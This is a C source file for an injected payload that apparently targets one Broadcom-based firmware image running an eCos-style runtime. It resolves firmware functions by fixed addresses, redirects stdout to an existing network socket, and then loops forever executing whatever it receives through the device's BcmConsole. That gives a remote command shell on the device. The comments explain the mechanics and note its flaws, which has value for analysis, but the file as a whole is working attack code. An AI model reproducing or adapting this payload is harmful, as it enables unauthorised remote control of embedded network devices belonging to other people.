/*
 * Absolute addresses inside one specific firmware image.  Everything below
 * is resolved by hand (no linker, no symbol table), so the payload is tied to
 * the exact build these offsets were taken from; on any other image they
 * point at unrelated code or data.  The cyg_* names suggest an eCos-style
 * runtime — TODO confirm against the target.
 */
#define SAVED_SOCKET_ADDR 0x81385b78     /* read as an int in __start: the socket descriptor to talk over */
#define RECV_ADDR 0x80f3e084             /* recv() */
#define CONSOLE_EXECUTE_ADDR 0x8028bb5c  /* BcmConsole "execute current command" */
#define GET_CONSOLE_SINGLETON_ADDR 0x8028bb08 /* returns the console singleton object */
#define MALLOC_ADDR 0x800049b4           /* malloc() */
#define BZERO_ADDR 0x80ee6f18            /* bzero() */
#define COMMAND_OFFSET 0x1080            /* byte offset of the command text inside the console object — capacity unknown from here */
#define SYG_FP_GET 0x80f3b870            /* cyg_fp_get(); macro name has a typo (SYG for CYG), used at one site only */
#define CYG_FP_FREE 0x80f3b8d8           /* cyg_fp_free() */
#define CYG_DF_ASSIGN 0x80f3b798         /* cyg_fd_assign(); macro name has a typo (DF for FD), used at one site only */
#define STRLCPY_ADDR 0x808f519c          /* strlcpy() */
#define PRINTF_ADDR 0x80ed9bd8           /* printf() */
#define DONE_STRING 0x8100b96e           /* address of a NUL-terminated string already present in the image */

/*
 * Function-pointer shapes for the addresses above.  They only need to match
 * the target's calling convention well enough for the calls in __start to
 * work; note that strlcpy_t and bzero_t are declared as returning void*
 * rather than the usual size_t / void — harmless here because neither return
 * value is used.
 */
typedef void* strlcpy_t(void* to, void const* from, unsigned int size);
typedef int recv_t(int s, void* buf, unsigned int len, int flags);
typedef void* malloc_t(unsigned int size);
typedef void* bzero_t(void* block, unsigned int size);
typedef void *cyg_fp_get_t(int fd);          /* fd -> file-pointer object */
typedef void cyg_fp_free_t(void *fp);        /* release a file-pointer object */
typedef int cyg_fd_assign_t(int fd, void *fp); /* bind a file-pointer object to descriptor fd */
typedef int printf_t(char *str, ...);        /* non-const format parameter; only ever passed DONE_STRING here */
typedef void* BcmConsoleGetSingletonInstance_t(void);
typedef int BcmConsoleExecuteCurrentCommand_t(void* console);
/*
 * Entry point of the injected code (bare __start: there is no C runtime, so
 * the reserved-identifier rule does not apply in the usual way).
 *
 * What it does, in order: rebinds descriptor 1 (stdout) to the socket stored
 * at SAVED_SOCKET_ADDR so console output flows back over the network, then
 * loops forever receiving up to 0x100 bytes at a time, copying each chunk
 * into the console singleton's command buffer and asking the console to
 * execute it.  Net effect: an interactive command channel for whoever holds
 * the other end of the socket.
 *
 * Nothing here is callable outside the target image — every function is
 * reached through a hard-coded absolute address — so the block cannot be
 * compiled or exercised in isolation.
 *
 * Observations useful to anyone analysing a device running this:
 *  - the loop never exits, not even when recv() reports 0/-1, so the thread
 *    and its stdout-to-socket binding outlive the connection;
 *  - the buffer from malloc is never freed and its NULL case is unchecked;
 *  - the trailing `return 0;` is unreachable.
 */
int __start(void) {
    /* Resolve each callee from its fixed address (see the #defines above). */
    recv_t *recv_ptr = (recv_t *) RECV_ADDR;
    malloc_t *malloc_ptr = (malloc_t *) MALLOC_ADDR;
    bzero_t *bzero_ptr = (bzero_t *) BZERO_ADDR;
    strlcpy_t *strlcpy_ptr = (strlcpy_t *) STRLCPY_ADDR;
    printf_t *printf_ptr = (printf_t *) PRINTF_ADDR;
    cyg_fp_get_t *cyg_fp_get_ptr = (cyg_fp_get_t *) SYG_FP_GET;
    cyg_fp_free_t *cyg_fp_free_ptr = (cyg_fp_free_t *) CYG_FP_FREE;
    cyg_fd_assign_t *cyg_fd_assign_ptr = (cyg_fd_assign_t *) CYG_DF_ASSIGN;
    BcmConsoleExecuteCurrentCommand_t *consoleExecute_ptr = (BcmConsoleExecuteCurrentCommand_t *) CONSOLE_EXECUTE_ADDR;
    BcmConsoleGetSingletonInstance_t *consoleGetInstance_ptr = (BcmConsoleGetSingletonInstance_t *) GET_CONSOLE_SINGLETON_ADDR;

    /* The socket descriptor is not created here; it is read from a fixed
     * memory location that something earlier must have populated. */
    int socket = *((int *)SAVED_SOCKET_ADDR);
    /* 0x100-byte receive buffer: result unchecked, never freed. */
    void *buffer = malloc_ptr(0x100);
    void *consoleInstance = consoleGetInstance_ptr();
    int receivedBytes = 0x0;

    /* Point descriptor 1 at the socket's file object so whatever the console
     * prints goes back over the connection.  cyg_fp_free presumably drops the
     * reference cyg_fp_get took, leaving fd 1 holding the only one — confirm. */
    void *fp = cyg_fp_get_ptr(socket);
    cyg_fd_assign_ptr(0x1, fp);
    cyg_fp_free_ptr(fp);
    /* Format string is a fixed string inside the image, not received data. */
    printf_ptr((char *)DONE_STRING);

    for (;;) {
        bzero_ptr(buffer, 0x100);
        /* flags = 0.  A return of 0 (peer closed) or -1 (error) just spins
         * back into another recv(); there is no exit condition. */
        receivedBytes = recv_ptr(socket, buffer, 0x100, 0x0);
        if (receivedBytes > 0) {
            /* The command text lives at a fixed offset inside the console
             * object; its capacity is not visible here, and receivedBytes
             * (at most 0x100) is not checked against it. */
            char *commandBuffer = ((char *)consoleInstance);
            commandBuffer += COMMAND_OFFSET;
            /* With BSD strlcpy semantics a size of receivedBytes copies at
             * most receivedBytes-1 bytes and NUL-terminates, i.e. the last
             * received byte is dropped — assuming the target's strlcpy
             * matches BSD; TODO confirm. */
            strlcpy_ptr(commandBuffer, buffer, receivedBytes);
            /* Writes a second terminator one slot past the one strlcpy placed
             * (index up to 0x101 relative to COMMAND_OFFSET). */
            commandBuffer[receivedBytes+1] = 0x0;
            consoleExecute_ptr(consoleInstance);
        }
    }
    /* Unreachable: the loop above has no break. */
    return 0;
}